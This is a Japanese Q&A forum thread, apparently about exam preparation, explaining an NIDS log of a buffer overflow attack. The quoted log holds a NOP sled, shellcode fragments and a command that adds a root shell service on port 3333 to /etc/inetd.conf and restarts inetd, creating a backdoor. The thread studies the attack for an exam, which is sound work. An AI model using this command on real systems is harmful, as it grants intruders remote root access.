NIDSのバッファオーバーフロー攻撃

あるセキュリティの問題で全くログの読み方がわからないので、
わかる人がいたら教えて下さい。

・NIDSにおいて、バッファオーバーフロー攻撃の検知により生成されたログがある。
　この攻撃は何か？

ここからログの内容
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000
000bffff7040000000000000000000000000000000000000000000000bffff7050000bffff70
6000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000bffff707<90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
k^<89>v<83><8D>^(<83><89>^<83><8D>^.<83><83><83>#<89>^1<83><88>F'<88>F*<83>
<88>F<89>F+,<89><8D>N<8D>V<80>1<89>@<80> /bin/sh.-c echo 3333 stream tcp nowait
root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd

１．バックドア用ポートの追加
２．バックドア用ユーザアカウントの追加
３．OS上のrootパスワードの変更
４．既存サービスのポート番号の変更
５．root権限でのリモートアクセス

答えは１番と５番ですが、その理由が全くわかりません。
よろしくお願いします。

No.1 ベストアンサー 回答者： onosuke 回答日時： 2011/11/23 22:40

ログ中に、UNIX系OSで実行可能なコマンド文（下記参照）が含まれています。

/bin/sh.-c echo 3333 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd

このコマンド文が攻撃対象のOSでどのような効果を持つのか考えれば、
答え（１番と５番）にたどり着きます。
もし、攻撃対象のOS指定が問題文になければ、問題の前提条件として、
広範囲なUNIX系OS（Solaris、HP-UX、AIX、NetBSDなど）の知識を保持している
ことが求められていますね。

簡単に解説すると、コマンド文は
　１．inetdの設定ファイルへ１行追記
　２．inetdに設定変更を反映
しているだけです。
「１．inetdの設定ファイルへ１行追記」している1行の内容を理解できれば、
答え（１番と５番）にたどり着きます。


状況が見えないのでアレですが、
もし、「試験対策問題」かつ「wakko777さんがUNIX系OSの知識を持っていない」場合、
試験対策としては、「この手の問題が出たらあきらめる（他の問題対策に時間をかける）」
のも一つの手かと思います。
その理由は、基礎知識として各種OSに精通していないと、
ほんの少し問題の内容が変わるだけで、回答不可能となるため。
（100%同じ内容の問題がでないと回答不可能）

この回答へのお礼

onosuke様
回答ありがとうございました。
返事が遅くなってしまい申し訳ありません。
これは、ネットワークの試験問題です。
UNIX系OSですか～。
まったく知識がないので、あきらめるのもありですね。

お礼日時：2011/12/06 00:55